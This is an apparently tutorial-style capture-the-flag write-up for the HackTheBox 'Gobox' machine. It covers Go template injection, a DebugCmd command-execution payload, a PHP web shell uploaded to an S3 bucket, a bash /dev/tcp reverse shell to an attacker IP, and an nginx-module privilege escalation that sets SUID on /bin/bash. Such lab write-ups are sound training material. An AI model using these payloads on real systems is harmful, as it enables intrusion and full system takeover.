HackTheBox Gobox Writeup
Explore the fundamentals of cybersecurity in the Gobox Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts#
10.10.11.113 gobox.htb
Script to add hosts automatically#
ip="10.10.11.113"
domain="gobox.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping#
nmap -sCV gobox.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-30 02:46 CEST
Nmap scan report for gobox.htb (10.10.11.113)
Host is up (0.050s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http nginx
|_http-title: Hacking eSports | {{.Title}}
8080/tcp open http nginx
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Hacking eSports | Home page
9000/tcp filtered cslistener
9001/tcp filtered tor-orport
9002/tcp filtered dynamid
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Identify the Vulnerability#
- The target site at
http://gobox.htb:8080/is running a Go-based application, as indicated by theX-Forwarded-Server: golangheader in BurpSuite responses. - Based on the response, you’ve found that the application could be vulnerable to Server-Side Template Injection (SSTI) using Go templates.
Initial SSTI Test#
- On the
/forgotpage, insert the payload{{ . }}in the email field to test for template injection. - If vulnerable, this will reveal Go template context variables or throw an error exposing internal details of the server.
Exploiting DebugCmd#
- After successfully logging in with credentials sent via email from the
/forgotpage, the source code of the application is revealed. - You discover the
DebugCmdfunction in the template engine, which allows the execution of system commands.
Test system commands using the following payloads:
{{ .DebugCmd "id" }} // Check for user privileges
{{ .DebugCmd "env" }} // View environment variables
{{ .DebugCmd "aws s3 ls s3://" }} // List S3 buckets
{{ .DebugCmd "aws s3 ls s3://website" }} // List contents of a specific bucket
Preparing the Payload#
- The goal is to upload a PHP reverse shell to the S3 bucket via the AWS CLI exposed through
DebugCmd. - First, generate a base64-encoded PHP reverse shell:
echo '<?php system($_GET['cmd']); ?>' | base64
This will output the encoded payload:
PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=
- Use
DebugCmdto decode and save this as a PHP file on the target system, and then upload it to the S3 bucket.
{{ .DebugCmd "echo -n PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo= | base64 -d > /tmp/evil.php" }}
{{ .DebugCmd "aws s3 cp /tmp/evil.php s3://website/evil.php" }}
Accessing the Payload#
- Once the reverse shell script is uploaded, it can be accessed via:
You can then execute commands by passing the cmd parameter.
Triggering the Reverse Shell#
To establish a reverse shell, use the following bash command:
bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/9001 0>&1'
Since this needs to be URL-encoded, use sed to encode only the & and / characters:
echo -n "bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/9001 0>&1'" | sed -e 's:/:%2f:g' -e 's:&:%26:g'
Setting Up a Listener#
On your local machine, set up a listener to catch the reverse shell:
nc -lvnp 9001
Triggering the Shell#
To trigger the reverse shell, visit:
http://gobox.htb/evil.php?cmd=bash -c '%2fbin%2fbash -i >%26 %2fdev%2ftcp%2f10.10.14.2%2f9001 0>%261'
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
Nginx Module Exploitation (ngx_http_execute_module)#
Initial Enumeration#
Retrieve the user flag from /home/ubuntu/user.txt:
cat /home/ubuntu/user.txt
Investigate Nginx configuration:
ls /etc/nginx/sites-enabled
cat /etc/nginx/sites-enabled/default
You find the custom directive command on;, which is not part of the default Nginx setup, indicating a custom module.
Identifying the Custom Module#
A Google search for command on; nginx github reveals the NginxExecute module, which allows command execution via Nginx.
Verifying the Nginx Module#
- To confirm the presence of this module and its functionality, you inspect the Nginx module binary for references to the
runfunction:
strings /usr/share/nginx/modules/ngx_http_execute_module.so | grep run
Command Execution#
Use the ippsec.run parameter in HTTP requests to execute system commands. Test with a basic command:
curl -g "http://127.0.0.1:8000/?ippsec.run[id]"
curl -g "http://127.0.0.1:8000/?ippsec.run[cat /root/root.txt]"
curl -g "http://127.0.0.1:8000/?ippsec.run[chmod 4755 /bin/bash]"
/bin/bash -p